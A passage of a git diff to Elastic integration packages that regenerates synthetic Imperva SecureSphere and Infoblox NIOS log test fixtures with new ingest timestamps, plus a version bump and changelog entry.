"1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.207.198.239,dstPort=4735,dbUsername=Loremips,srcIP=10.8.147.176,srcPort=5920,creatTime=15 April 2019 
07:40:49,srvGroup=odtem,service=ite,appName=tseddo,event#=ptatems,eventType=Login,usrGroup=ori,usrAuth=False,application=\"exerc\",osUsername=aUteni,srcHost=uidolo7626.local,dbName=rchite,schemaName=incididu,bindVar=idolor,sqlError=failure,respSize=3043,respTime=36.712000,affRows=oinB,action=\"accept\",rawQuery=\"econsequ\"", "event": { - "ingested": "2021-06-09T11:17:04.826150100Z" + "ingested": "2021-12-14T14:46:55.618581233Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.116.26.185,dstPort=595,dbUsername=oNe,srcIP=10.206.221.180,srcPort=6818,creatTime=2019-04-29 14:43:23,srvGroup=repr,service=idu,appName=otam,event#=amquaera,eventType=rumS,usrGroup=uelau,usrAuth=quidolor,application=\"cca\",osUsername=litesseq,srcHost=dmini3435.internal.domain,dbName=rumexerc,schemaName=nseq,bindVar=quisnost,sqlError=unknown,respSize=3218,respTime=26.485000,affRows=orisnisi,action=\"block\",rawQuery=\"nul\"", "event": { - "ingested": "2021-06-09T11:17:04.826153900Z" + "ingested": "2021-12-14T14:46:55.618581621Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.86.180.150,dstPort=5495,dbUsername=mnisis,srcIP=10.253.127.130,srcPort=5339,creatTime=2019-05-13 21:45:57,srvGroup=isciveli,service=urve,appName=sundeomn,event#=tasu,eventType=Logout,usrGroup=equunt,usrAuth=True,application=\"uat\",osUsername=itasper,srcHost=nibusBo1864.domain,dbName=ent,schemaName=etconsec,bindVar=docons,sqlError=failure,respSize=4564,respTime=4.592000,affRows=mremap,action=\"allow\",rawQuery=\"sperna\"", "event": { - "ingested": "2021-06-09T11:17:04.826157600Z" + "ingested": "2021-12-14T14:46:55.618582010Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": 
"%IMPERVA-Imperva,alert#=mexe,event#=sequatDu,createTime=2019-05-28 04:48:31,updateTime=ssuscip,alertSev=high,group=ciade,ruleName=\"busBonor\",evntDesc=\"enima\",category=emseq,disposition=osamni,eventType=umetMa,proto=ipv6-icmp,srcPort=4469,srcIP=10.220.175.201,dstPort=579,dstIP=10.158.161.5,policyName=\"eab\",occurrences=4098,httpHost=ciduntut,webMethod=atisu,url=\"https://internal.example.com/architec/incul.txt?aborios=mco#amnisiu\",webQuery=\"suntincu\",soapAction=lore,resultCode=equatu,sessionID=enbyCi,username=dolo,addUsername=adipi,responseTime=beata,responseSize=evelites,direction=inbound,dbUsername=tNeq,queryGroup=umtot,application=\"eumiurer\",srcHost=inv6528.www5.example,osUsername=rrors,schemaName=dolo,dbName=tsed,hdrName=corpori,action=allow", "event": { - "ingested": "2021-06-09T11:17:04.826163200Z" + "ingested": "2021-12-14T14:46:55.618582394Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,event#=uioff,createTime=2019-06-11 11:51:06,eventType=ema,eventSev=low,username=mpo,subsystem=deritinv,message=\"ten\"", "event": { - "ingested": "2021-06-09T11:17:04.826167200Z" + "ingested": "2021-12-14T14:46:55.618582815Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.150.27.144,dstPort=5627,dbUsername=res,srcIP=10.248.16.82,srcPort=6834,creatTime=25 June 2019 18:53:40,srvGroup=loinv,service=umd,appName=madmi,event#=xercit,eventType=Login,usrGroup=avolup,usrAuth=True,application=\"etdo\",osUsername=tuserror,srcHost=nisiutal4437.www.example,dbName=uipex,schemaName=ditautf,bindVar=orr,sqlError=failure,respSize=4367,respTime=25.972000,affRows=uptas,action=\"cancel\",rawQuery=\"osquira\"", "event": { - "ingested": "2021-06-09T11:17:04.826171400Z" + "ingested": "2021-12-14T14:46:55.618583260Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.146.131.76,dstPort=2281,dbUsername=orsi,srcIP=10.173.19.140,srcPort=7780,creatTime=2019-07-10 01:56:14,srvGroup=atu,service=ddo,appName=veli,event#=ata,eventType=Logout,usrGroup=untmoll,usrAuth=False,application=\"ididun\",osUsername=olo,srcHost=tqui5172.www.local,dbName=untex,schemaName=Except,bindVar=elitsedd,sqlError=failure,respSize=5844,respTime=52.550000,affRows=cingel,action=\"allow\",rawQuery=\"seos\"", "event": { - "ingested": "2021-06-09T11:17:04.826175100Z" + "ingested": "2021-12-14T14:46:55.618583653Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.69.5.227,dstPort=5845,dbUsername=doloreme,srcIP=10.171.175.165,srcPort=5776,creatTime=2019-07-24 08:58:48,srvGroup=taspe,service=litess,appName=enimadm,event#=corpori,eventType=onemull,usrGroup=emeu,usrAuth=uisaute,application=\"tvol\",osUsername=ntocc,srcHost=intocca6708.mail.corp,dbName=dquiaco,schemaName=rumw,bindVar=ula,sqlError=failure,respSize=5201,respTime=46.690000,affRows=quam,action=\"deny\",rawQuery=\"edquian\"", "event": { - "ingested": "2021-06-09T11:17:04.826179100Z" + "ingested": "2021-12-14T14:46:55.618584051Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.213.214.118,dstPort=7851,dbUsername=ate,srcIP=10.253.175.129,srcPort=5547,creatTime=7 August 2019 16:01:23,srvGroup=rsi,service=tuser,appName=equinesc,event#=ectet,eventType=Login,usrGroup=emull,usrAuth=False,application=\"enatuser\",osUsername=epteurs,srcHost=isetqu2843.www.invalid,dbName=niamqu,schemaName=nrep,bindVar=lauda,sqlError=failure,respSize=6260,respTime=9.295000,affRows=aincidu,action=\"deny\",rawQuery=\"ipsamvol\"", "event": { - "ingested": "2021-06-09T11:17:04.826190500Z" + "ingested": 
"2021-12-14T14:46:55.618584450Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=estquido,event#=eufugiat,createTime=2019-08-21 23:03:57,updateTime=minima,alertSev=high,group=bor,ruleName=\"uisnos\",evntDesc=\"loi\",category=tation,disposition=seddoe,eventType=adol,proto=rdp,srcPort=7756,srcIP=10.149.91.130,dstPort=3548,dstIP=10.89.26.170,policyName=\"aqueipsa\",occurrences=5863,httpHost=ide,webMethod=atcupi,url=\"https://www.example.com/sit/ugi.gif?sitametc=rur#edut\",webQuery=\"sitametc\",soapAction=iarchite,resultCode=uide,sessionID=iono,username=aboris,addUsername=eturad,responseTime=ipiscive,responseSize=sequu,direction=internal,dbUsername=epteur,queryGroup=iqu,application=\"uptateve\",srcHost=commodo6041.mail.localhost,osUsername=atus,schemaName=orumetMa,dbName=inventor,hdrName=dolo,action=block", "event": { - "ingested": "2021-06-09T11:17:04.826197700Z" + "ingested": "2021-12-14T14:46:55.618584905Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=tmolli,event#=orumSe,createTime=2019-09-05 06:06:31,updateTime=mSe,alertSev=high,group=teturad,ruleName=\"alorumwr\",evntDesc=\"pis\",category=idol,disposition=mmodico,eventType=emaccu,proto=rdp,srcPort=5818,srcIP=10.52.106.68,dstPort=856,dstIP=10.81.108.232,policyName=\"atemq\",occurrences=5098,httpHost=volupta,webMethod=Quisaut,url=\"https://internal.example.net/obeatae/sedqui.jpg?nulap=onseq#amrem\",webQuery=\"plicab\",soapAction=isisten,resultCode=eiusmodt,sessionID=naaliq,username=aco,addUsername=psamvolu,responseTime=inculp,responseSize=eni,direction=inbound,dbUsername=sedqu,queryGroup=ipitlabo,application=\"olorinr\",srcHost=gitse6744.api.local,osUsername=neavolup,schemaName=uaturve,dbName=lapa,hdrName=uepor,action=\"allow\",errormsg=\"failure\"", "event": { - "ingested": 
"2021-06-09T11:17:04.826203100Z" + "ingested": "2021-12-14T14:46:55.618585296Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=umquamei,event#=nih,createTime=2019-09-19 13:09:05,updateTime=tionev,alertSev=high,group=quia,ruleName=\"eabill\",evntDesc=\"itatiset\",category=uaerat,disposition=met,eventType=isno,proto=icmp,srcPort=2572,srcIP=10.230.48.97,dstPort=1991,dstIP=10.223.10.28,policyName=\"emveleu\",occurrences=4029,httpHost=norumet,webMethod=tconse,url=\"https://mail.example.com/iaturE/inc.htm?uisaut=mnihilm#itinvo\",webQuery=\"lestia\",soapAction=anti,resultCode=eavo,sessionID=enderi,username=erit,addUsername=uptatem,responseTime=reeufug,responseSize=temveleu,direction=unknown,dbUsername=repre,queryGroup=consec,application=\"untmoll\",srcHost=par3605.internal.localdomain,osUsername=usmodte,schemaName=untex,dbName=ommodi,hdrName=ntiu,action=\"deny\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826207600Z" + "ingested": "2021-12-14T14:46:55.618585676Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.115.42.231,dstPort=2143,dbUsername=res,srcIP=10.161.212.150,srcPort=2748,creatTime=3 October 2019 20:11:40,srvGroup=corporis,service=turExc,appName=urvelil,event#=ulapa,eventType=Login,usrGroup=abi,usrAuth=False,application=\"ameiusm\",osUsername=tasnul,srcHost=isau4356.www.home,dbName=niamqui,schemaName=sequamn,bindVar=onse,sqlError=failure,respSize=4846,respTime=6.993000,affRows=aliquaUt,action=\"deny\",rawQuery=\"natus\"", "event": { - "ingested": "2021-06-09T11:17:04.826212Z" + "ingested": "2021-12-14T14:46:55.618586084Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=emp,event#=suscipit,createTime=2019-10-18 
03:14:14,updateTime=iaconseq,alertSev=medium,group=sciuntNe,ruleName=\"nevo\",evntDesc=\"stiaec\",category=officia,disposition=ametcon,eventType=gnid,proto=ipv6,srcPort=5677,srcIP=10.226.75.20,dstPort=3896,dstIP=10.247.108.144,policyName=\"iutaliqu\",occurrences=3711,httpHost=onsectet,webMethod=iat,url=\"https://www5.example.org/elaud/temsequ.htm?dolo=iciatisu#eip\",webQuery=\"iquaUte\",soapAction=aborumSe,resultCode=writt,sessionID=dent,username=tema,addUsername=saquaeab,responseTime=rpo,responseSize=inr,direction=internal,dbUsername=edquiac,queryGroup=olore,application=\"urEx\",srcHost=labo3477.www5.domain,osUsername=maccusan,schemaName=fugia,dbName=psa,hdrName=iset,action=\"block\",errormsg=\"success\"", "event": { - "ingested": "2021-06-09T11:17:04.826215900Z" + "ingested": "2021-12-14T14:46:55.618586474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.192.15.65,dstPort=3328,dbUsername=nimides,srcIP=10.97.22.61,srcPort=6420,creatTime=2019-11-01 10:16:48,srvGroup=labor,service=quelaud,appName=ira,event#=gna,eventType=aparia,usrGroup=ntoreve,usrAuth=remips,application=\"uptatemU\",osUsername=illumd,srcHost=itseddo2209.mail.domain,dbName=olu,schemaName=rExcep,bindVar=turExcep,sqlError=success,respSize=4173,respTime=166.270000,affRows=duntutla,action=\"block\",rawQuery=\"tmollit\"", "event": { - "ingested": "2021-06-09T11:17:04.826222300Z" + "ingested": "2021-12-14T14:46:55.618586934Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,alert#=venia,event#=Loremi,createTime=2019-11-15 
17:19:22,updateTime=uisnostr,alertSev=medium,group=vol,ruleName=\"ommodi\",evntDesc=\"ritat\",category=dipi,disposition=asnulapa,eventType=atev,proto=tcp,srcPort=7469,srcIP=10.197.254.133,dstPort=2009,dstIP=10.116.76.161,policyName=\"tla\",occurrences=2608,httpHost=ender,webMethod=quid,url=\"https://mail.example.net/teturad/nimide.htm?ueporroq=writ#ema\",webQuery=\"ioffici\",soapAction=agni,resultCode=tat,sessionID=metconse,username=ide,addUsername=equu,responseTime=pernatur,responseSize=orem,direction=outbound,dbUsername=caecatc,queryGroup=iarc,application=\"emquia\",srcHost=duntutl3396.api.host,osUsername=idu,schemaName=trudex,dbName=ncul,hdrName=mcorpor,action=cancel", "event": { - "ingested": "2021-06-09T11:17:04.826226200Z" + "ingested": "2021-12-14T14:46:55.618587326Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.28.77.79,dstPort=3615,dbUsername=upta,srcIP=10.144.14.15,srcPort=1150,creatTime=30 November 2019 00:21:57,srvGroup=consequ,service=min,appName=riame,event#=gnaal,eventType=Login,usrGroup=nti,usrAuth=True,application=\"tetura\",osUsername=utlab,srcHost=colabo6686.internal.invalid,dbName=uptass,schemaName=rspic,bindVar=itsedq,sqlError=success,respSize=4810,respTime=22.348000,affRows=iut,action=\"deny\",rawQuery=\"nemu\"", "event": { - "ingested": "2021-06-09T11:17:04.826230Z" + "ingested": "2021-12-14T14:46:55.618587719Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "%IMPERVA-Imperva,dstIP=10.248.177.182,dstPort=317,dbUsername=quei,srcIP=10.18.15.43,srcPort=2224,creatTime=2019-12-14 
07:24:31,srvGroup=reetdol,service=umtotam,appName=itaedi,event#=ant,eventType=tiumt,usrGroup=taedicta,usrAuth=mveniamq,application=\"exerci\",osUsername=quaturve,srcHost=tsunti1164.www.example,dbName=equatur,schemaName=caecat,bindVar=oreetd,sqlError=unknown,respSize=983,respTime=113.318000,affRows=nderit,action=\"accept\",rawQuery=\"icer\"", "event": { - "ingested": "2021-06-09T11:17:04.826234Z" + "ingested": "2021-12-14T14:46:55.618588103Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" diff --git a/packages/imperva/manifest.yml b/packages/imperva/manifest.yml index e0da10029f9..e67d8cf562a 100644 --- a/packages/imperva/manifest.yml +++ b/packages/imperva/manifest.yml @@ -1,7 +1,7 @@ format_version: 1.0.0 name: imperva title: Imperva SecureSphere Logs -version: 0.6.0 +version: 0.6.1 description: Collect SecureSphere logs from Imperva devices with Elastic Agent. categories: ["network", "security"] release: experimental diff --git a/packages/infoblox/changelog.yml b/packages/infoblox/changelog.yml index c576154cfa7..0fb56753174 100644 --- a/packages/infoblox/changelog.yml +++ b/packages/infoblox/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json b/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json index 14934a276ac..427f3dbfc48 100644 --- a/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/infoblox/data_stream/nios/_dev/test/pipeline/test-generated.log-expected.json 
@@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "January 29 06:09:59 doeiu3942.localdomain -:rc executing eporr start", "event": { - "ingested": "2021-06-09T11:22:12.539379200Z" + "ingested": "2021-12-14T14:46:58.554771620Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 12 13:12:33 tia7019.www.invalid :diskcheck quis", "event": { - "ingested": "2021-06-09T11:22:12.539402700Z" + "ingested": "2021-12-14T14:46:58.554776423Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 26 20:15:08 dolo1720.api.example 10.250.162.122 logger: com", "event": { - "ingested": "2021-06-09T11:22:12.539410100Z" + "ingested": "2021-12-14T14:46:58.554777474Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 12 03:17:42 ratio1111.localdomain -:diskcheck atio", "event": { - "ingested": "2021-06-09T11:22:12.539418100Z" + "ingested": "2021-12-14T14:46:58.554778246Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 26 10:20:16 tconsec5932.mail.domain shutdown[uam]: shutting down for system reboot", "event": { - "ingested": "2021-06-09T11:22:12.539424200Z" + "ingested": "2021-12-14T14:46:58.554778783Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 9 17:22:51 llu4762.mail.localdomain snmptrapd[scivel]: NET-SNMP version 1.5695 aperi", "event": { - "ingested": "2021-06-09T11:22:12.539429600Z" + "ingested": "2021-12-14T14:46:58.554779301Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 24 00:25:25 
estqui6557.www.localhost -:syslog-ng equuntu", "event": { - "ingested": "2021-06-09T11:22:12.539435200Z" + "ingested": "2021-12-14T14:46:58.554779839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 08 07:27:59 mcolabor1656.www5.corp netauto_discovery[giatq]: quid:fug(uatDuis)10.68.114.91/veri: SNMP Credentials: Failed to authenticate", "event": { - "ingested": "2021-06-09T11:22:12.539440300Z" + "ingested": "2021-12-14T14:46:58.554780345Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 22 14:30:33 exercit4665.internal.domain -:scheduled_ftp_backups Scheduled backup to the eetd was successful - Backup file eip", "event": { - "ingested": "2021-06-09T11:22:12.539445200Z" + "ingested": "2021-12-14T14:46:58.554781176Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 5 21:33:08 iutal13.api.localdomain python[eacomm]: Utenimad: nibusBon.ehend [ueipsaqu]: Populated uidolore niamqu222.localdomain DnsView=tevelit", "event": { - "ingested": "2021-06-09T11:22:12.539450100Z" + "ingested": "2021-12-14T14:46:58.554781894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 20 04:35:42 boree6686.www5.host ntpd[iinea]: ipit", "event": { - "ingested": "2021-06-09T11:22:12.539456300Z" + "ingested": "2021-12-14T14:46:58.554782386Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 4 11:38:16 itlabori2344.mail.invalid -:openvpn-member OpenVPN 1.4105 [icmp] [aper] essequ", "event": { - "ingested": "2021-06-09T11:22:12.539461500Z" + "ingested": "2021-12-14T14:46:58.554783401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 
"preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 18 18:40:50 tessec3539.home nsect: rc6 ntutl", "event": { - "ingested": "2021-06-09T11:22:12.539466400Z" + "ingested": "2021-12-14T14:46:58.554784063Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 2 01:43:25 siuta2896.www.localhost -:ntpd ntpd exiting on signal 2946", "event": { - "ingested": "2021-06-09T11:22:12.539471300Z" + "ingested": "2021-12-14T14:46:58.554788807Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 16 08:45:59 strude910.internal.local pidof[ittenbyC]: can't read sid from aperi", "event": { - "ingested": "2021-06-09T11:22:12.539476200Z" + "ingested": "2021-12-14T14:46:58.554789617Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 30 15:48:33 lores1409.www.home :sSMTP etc", "event": { - "ingested": "2021-06-09T11:22:12.539480900Z" + "ingested": "2021-12-14T14:46:58.554790284Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 13 22:51:07 nimadmin1493.www5.example rc3[lpa]: entsu", "event": { - "ingested": "2021-06-09T11:22:12.539485700Z" + "ingested": "2021-12-14T14:46:58.554791187Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "September 28 05:53:42 mqui4683.www.localhost tasuntex: kernel sunt", "event": { - "ingested": "2021-06-09T11:22:12.539490400Z" + "ingested": "2021-12-14T14:46:58.554791894Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 12 12:56:16 incidi2966.www.test controld[olupt]: Distribution 
Complete", "event": { - "ingested": "2021-06-09T11:22:12.539495200Z" + "ingested": "2021-12-14T14:46:58.554792542Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "October 26 19:58:50 ugiatnu5252.internal.localdomain -:syslog erc", "event": { - "ingested": "2021-06-09T11:22:12.539500300Z" + "ingested": "2021-12-14T14:46:58.554793172Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 10 03:01:24 aperia4409.www5.invalid :controld Distribution Started", "event": { - "ingested": "2021-06-09T11:22:12.539505400Z" + "ingested": "2021-12-14T14:46:58.554793829Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "November 24 10:03:59 emagnama4259.example 10.206.136.206 dhcpd: Average suntinc dynamic DNS update latency: success micro seconds", "event": { - "ingested": "2021-06-09T11:22:12.539510400Z" + "ingested": "2021-12-14T14:46:58.554794401Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 8 17:06:33 isno2228.home nnu: smart_check_io dolo", "event": { - "ingested": "2021-06-09T11:22:12.539515100Z" + "ingested": "2021-12-14T14:46:58.554795374Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "December 23 00:09:07 amvolup7700.www5.corp 10.19.194.101 rsyncd: rsync on orinrepr from conse2991.internal.lan (10.116.104.101)", "event": { - "ingested": "2021-06-09T11:22:12.539520700Z" + "ingested": "2021-12-14T14:46:58.554796153Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 6 07:11:41 tat7551.internal.local rc6[itinvo]: mdolore", "event": { - 
"ingested": "2021-06-09T11:22:12.539525900Z" + "ingested": "2021-12-14T14:46:58.554796839Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "January 20 14:14:16 siarchi2289.mail.lan debug_mount[olupta]: mount mipsumd", "event": { - "ingested": "2021-06-09T11:22:12.539530900Z" + "ingested": "2021-12-14T14:46:58.554797571Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 3 21:16:50 remi2114.local ionevo: ntpd ntpd exiting on signal 3219", "event": { - "ingested": "2021-06-09T11:22:12.539536Z" + "ingested": "2021-12-14T14:46:58.554798212Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "February 18 04:19:24 dolor2707.api.localhost httpd[commod]: 2017-2-18 4:19:24.adol [doloremi]: Login_Denied - - to=luptasn ip=10.153.111.103 info=itquiin", "event": { - "ingested": "2021-06-09T11:22:12.539541700Z" + "ingested": "2021-12-14T14:46:58.554799237Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "March 4 11:21:59 que651.www5.host init[etconse]: tincu", "event": { - "ingested": "2021-06-09T11:22:12.539546700Z" + "ingested": "2021-12-14T14:46:58.554800390Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Mar 18 18:24:33 asun1250.api.localdomain DIS[oluptate]: onseq:serunt: Deviceaquaeabi/10.171.157.74login failurefailure", "event": { - "ingested": "2021-06-09T11:22:12.539551800Z" + "ingested": "2021-12-14T14:46:58.554801179Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 2 01:27:07 ento4488.www5.localhost :rc6 eriamea", "event": { - "ingested": 
"2021-06-09T11:22:12.539557300Z" + "ingested": "2021-12-14T14:46:58.554801933Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 16 08:29:41 pisciv7108.lan 10.140.136.44 named: client 10.31.14.36#2285/key dhcp_updater_default: signer \"vitaedi\" approved", "event": { - "ingested": "2021-06-09T11:22:12.539562200Z" + "ingested": "2021-12-14T14:46:58.554802572Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "April 30 15:32:16 veniamq1608.www.localdomain colab: diskcheck ommodico", "event": { - "ingested": "2021-06-09T11:22:12.539566900Z" + "ingested": "2021-12-14T14:46:58.554803371Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 14 22:34:50 tin183.api.corp netauto_discovery[sperna]: eabilloi:estia(tper)10.163.5.243/osqui: SNMP Credentials: Failed to authenticate", "event": { - "ingested": "2021-06-09T11:22:12.539574Z" + "ingested": "2021-12-14T14:46:58.554804060Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "May 29 05:37:24 fdeFi1123.api.domain INFOBLOX-Grid[etdol]: Started distribution on member with IP address 10.177.36.38", "event": { - "ingested": "2021-06-09T11:22:12.539579200Z" + "ingested": "2021-12-14T14:46:58.554805032Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 12 12:39:58 aevit37.www5.test ati: kernel Linux version 1.6668 (gel) (lorsitam) mpo", "event": { - "ingested": "2021-06-09T11:22:12.539584Z" + "ingested": "2021-12-14T14:46:58.554805700Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "June 26 19:42:33 
aliquam1364.api.corp -:syslog eratv", "event": { - "ingested": "2021-06-09T11:22:12.539588700Z" + "ingested": "2021-12-14T14:46:58.554806448Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 11 02:45:07 uir1374.mail.domain -:smart_check_io quiratio", "event": { - "ingested": "2021-06-09T11:22:12.539593300Z" + "ingested": "2021-12-14T14:46:58.554807196Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "July 25 09:47:41 nse2256.www.localdomain equat: db_jnld Resolved conflict for replicated delete of TXT \"derit\" in zone \"dexea\"", "event": { - "ingested": "2021-06-09T11:22:12.539598Z" + "ingested": "2021-12-14T14:46:58.554808150Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "August 8 16:50:15 lapar1024.www5.local intocc: sSMTP Unable to locate liqu2936.api.localdomain.", "event": { - "ingested": "2021-06-09T11:22:12.539602800Z" + "ingested": "2021-12-14T14:46:58.554808893Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ 